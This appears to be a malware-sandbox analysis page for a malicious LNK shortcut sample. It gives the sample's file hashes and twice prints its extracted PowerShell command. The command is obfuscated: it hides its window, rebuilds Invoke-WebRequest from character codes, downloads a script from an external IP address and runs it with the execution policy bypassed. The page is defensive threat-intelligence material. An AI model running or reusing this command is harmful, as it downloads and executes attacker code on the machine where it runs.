General
Structural Analysis
Config.0
Yara Rules17
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 94f44fcfd5e6eb44aaaed4549c95ea5c
|
| Sha1 | 0f257cc31c6ee3a3e3ff47e7829beca0576392c8
|
| Sha256 | d155f2bdb03cdec2ec5f16910bf1900caf758e75c30cd48c9cfe31a1367fb1b9
|
| Sha384 | e9af03735b2ede8d9b92e48d1fecefa7223e89031b4b275e74d43f9b18b343f97ce01dac054c1a8c633f4adbc3b05368
|
| Sha512 | add59fc12c36115e83d7a2f88915294d149fc0fda65e66ae00e40d2aa0e685f32a1354a95eb7e11306586f24fdab62a003c008fbfce4b746480ecd6dc6b18f27
|
| SSDeep | 12:8d/is0oNJfVUWX4SNJo6Cs8XILDBniTXSOI+4219kTetIyxWkjBd1d/N+a/SB4AU:8d/lf9fCAhiTaZ2vkRyxWahdXvGOUb
|
| TLSH | 97B25B163BF5050CF5F29A38B6B3A221847B7A19DE314B8C0180DA586831E11D555F2B
|
File Structure
94f44fcfd5e6eb44aaaed4549c95ea5c
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe /w 1 echo pWpmnGitENCRqmuiquHkdmT; $a = -join (0x69,0x77,0x72 | % {[char]$_}); .($a) -uri htt''p'':''//5.101.85.''24/bldnsh/woodwind.ps1 -OutFile woodwind.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\woodwind.ps1" |
94f44fcfd5e6eb44aaaed4549c95ea5c (23.77 KB)
File Structure
94f44fcfd5e6eb44aaaed4549c95ea5c
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe /w 1 echo pWpmnGitENCRqmuiquHkdmT; $a = -join (0x69,0x77,0x72 | % {[char]$_}); .($a) -uri htt''p'':''//5.101.85.''24/bldnsh/woodwind.ps1 -OutFile woodwind.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\woodwind.ps1" Malicious |
94f44fcfd5e6eb44aaaed4549c95ea5c |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.